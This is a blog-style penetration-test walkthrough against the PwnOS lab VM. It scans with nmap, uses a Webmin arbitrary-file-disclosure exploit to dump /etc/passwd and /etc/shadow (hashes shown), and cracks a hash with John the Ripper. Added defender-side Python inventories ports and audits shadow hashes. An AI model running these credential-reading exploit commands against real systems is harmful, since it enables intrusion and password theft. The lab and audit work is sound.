Monday, October 8, 2012

Privilege Escalation of PwnOS

> Information Gathering of target (PwnOS: 192.168.254.129)
1. Used Zenmap, which ran the following nmap scan (all TCP ports, OS and version detection):
   #nmap -p 1-65535 -T4 -A -v 192.168.254.129


PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)

MAC Address: 00:0C:29:B1:C4:4F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 497.102 days (since Mon May 30 17:00:49 2011)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name:
|_  System time: 2012-10-08 19:26:31 UTC-5

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.254.129


2. Used nmap for a service version scan:
#nmap -sV 192.168.254.129

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:B1:C4:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel



> Service Enumeration

Port       Service        Version
22/tcp     ssh            OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp     http           Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp    netbios-ssn    Samba smbd 3.X (workgroup: MSHOME)
445/tcp    netbios-ssn    Samba smbd 3.X (workgroup: MSHOME)
10000/tcp  http           MiniServ 0.01 (Webmin httpd)
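The service table above was built by hand from the nmap output. The following is an added example (not code from the original post) that does the same thing programmatically and then applies two defender-side checks to the inventory: open ports that are not on a documented baseline, and services that reveal a product/version banner. The sample input is the post's own nmap -sV port table pasted as a string; the baseline of {22, 80} is a hypothetical allow-list chosen for illustration.

```python
import re

# Constructed sample input: the port table from the post's nmap -sV run,
# pasted as one string so the parser can be exercised offline.
SAMPLE_NMAP = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:B1:C4:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
"""

# One port-table row: "<port>/<proto>  <state>  <service>  [<version banner>]".
# NSE script lines ("| ..."), the header and the trailer lines do not match.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_ports(text):
    """Return one dict per port row found in normal (non-XML) nmap output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        services.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": (version or "").strip(),
        })
    return services


def unexpected_open_ports(services, allowed_ports):
    """Baseline check: open ports that are not on the documented allow-list.
    Each port returned needs a firewall rule, a service switched off, or a
    deliberate update to the baseline."""
    return sorted(
        s["port"] for s in services
        if s["state"] == "open" and s["port"] not in allowed_ports
    )


def banner_disclosures(services):
    """Open services whose banner names a product and version; those strings
    are exactly what gets looked up in an exploit database."""
    return {s["port"]: s["version"]
            for s in services if s["state"] == "open" and s["version"]}


if __name__ == "__main__":
    inventory = parse_nmap_ports(SAMPLE_NMAP)
    for s in inventory:
        print(f'{s["port"]}/{s["proto"]:<4} {s["service"]:<12} {s["version"]}')
    # Hypothetical baseline: only SSH and the web site are meant to be reachable.
    print("unexpected open ports:", unexpected_open_ports(inventory, {22, 80}))
    print("banners:", banner_disclosures(inventory))
```

For a real engagement the same parser can be pointed at saved scan output from each host and diffed against the previous run, so a newly exposed management port such as Webmin's 10000/tcp shows up as baseline drift instead of being noticed only by an attacker.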

> Vulnerability Assessment
#cd /pentest/exploits/exploitdb
#./searchsploit webmin

Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
root@latif:/pentest/exploits/exploitdb# cd platforms/multiple/remote/
root@latif:/pentest/exploits/exploitdb/platforms/multiple/remote# ./2017.pl
bash: ./2017.pl: /usr/bin/perl^M: bad interpreter: No such file or directory
root@latif:/pentest/exploits/exploitdb/platforms/multiple/remote# ./2017.pl
bash: ./2017.pl: /usr/bin/perl^M: bad interpreter: No such file or directory
root@latif:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

This matches the vulnerability assessment of the target: Webmin < 1.290 (arbitrary file disclosure). The two "bad interpreter" errors above come from CRLF line endings in the script's shebang line (the ^M), which is why it is invoked through perl explicitly.

> Exploit
#cd platforms/multiple/remote
1. Read /etc/passwd through the file disclosure
#perl 2017.pl 192.168.254.129 10000 /etc/passwd 0
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

2. Read /etc/shadow through the file disclosure
#perl 2017.pl 192.168.254.129 10000 /etc/shadow 0
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::


> Privilege Escalation
Once you have the passwd and shadow files, you must crack the password hashes; this step is the privilege escalation. To crack the hashes I used John the Ripper.

Create a file in the john folder containing the hash to crack. Here I want to crack osama's password:
#nano tes.txt
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

After saving it, run:
#./john tes.txt

Wait until the password is cracked :)
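From the defender's side, the reason this step works is visible in the shadow file itself: every account uses $1$ (md5crypt) hashes, none of the passwords has a maximum age, and root's entry is crackable. The following is an added example (not from the original post) that audits shadow lines for exactly those conditions: it classifies each hash by its crypt(3) prefix, flags algorithms that are cheap to brute-force offline, and checks the aging fields. The sample input copies a few lines from the post's /etc/shadow output and adds one constructed $6$ entry (placeholder hash value) for contrast; "today" is fixed to the post date so the result is reproducible.

```python
from datetime import date, timedelta

# Constructed sample input: lines copied from the post's /etc/shadow output
# plus one constructed sha512crypt ($6$) entry. The $6$ hash is a placeholder.
SAMPLE_SHADOW = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
alice:$6$constructedsalt$PLACEHOLDERHASHVALUE:15000:0:90:7:::
"""

POST_DATE = date(2012, 10, 8)   # used as "today" so the audit is reproducible
EPOCH = date(1970, 1, 1)        # shadow aging fields count days since this date

# crypt(3) identifier -> (algorithm name, cheap to brute-force offline?)
HASH_PREFIXES = {
    "$1$": ("md5crypt", True),   # what the target uses: 1000 MD5 rounds, fast on modern hardware
    "$2a$": ("bcrypt", False), "$2b$": ("bcrypt", False), "$2y$": ("bcrypt", False),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$7$": ("scrypt", False),
    "$y$": ("yescrypt", False),
}


def classify_hash(field):
    """Map the second shadow field to (algorithm, is_weak)."""
    if field == "":
        return "empty", True          # no password at all
    if field.startswith(("!", "*")):
        return "locked", False        # password login disabled for this account
    for prefix, (name, weak) in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name, weak
    if len(field) == 13 and "$" not in field:
        return "descrypt", True       # traditional DES crypt: 8-character limit
    return "unknown", True            # unrecognised format: treat as needing review


def audit_shadow(text, today=POST_DATE, max_age_days=365):
    """Return a list of {user, algorithm, issues} dicts, one per shadow line."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            findings.append({"user": fields[0], "algorithm": "malformed",
                             "issues": ["expected 9 colon-separated fields"]})
            continue
        user, pw, lastchg, _min_age, max_age = fields[:5]
        algo, weak = classify_hash(pw)
        issues = []
        if weak:
            issues.append(f"weak hash ({algo})")
        if algo != "locked":
            if lastchg.isdigit():
                changed = EPOCH + timedelta(days=int(lastchg))
                if (today - changed).days > max_age_days:
                    issues.append(f"password unchanged since {changed.isoformat()}")
            if max_age in ("", "99999"):
                issues.append("no maximum password age")
        findings.append({"user": user, "algorithm": algo, "issues": issues})
    return findings


def exposed_accounts(findings):
    """Users whose hash would crack cheaply if /etc/shadow were disclosed."""
    return [f["user"] for f in findings
            if any(i.startswith("weak hash") for i in f["issues"])]


if __name__ == "__main__":
    results = audit_shadow(SAMPLE_SHADOW)
    for r in results:
        print(f'{r["user"]:<8} {r["algorithm"]:<12} {"; ".join(r["issues"]) or "ok"}')
    print("exposed if shadow leaks:", exposed_accounts(results))
```

On the target every password-bearing account would be listed as exposed; migrating the hashes to sha512crypt or yescrypt (and setting a maximum age) does not stop the file disclosure, but it turns "wait until the password is cracked" into a much longer wait.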



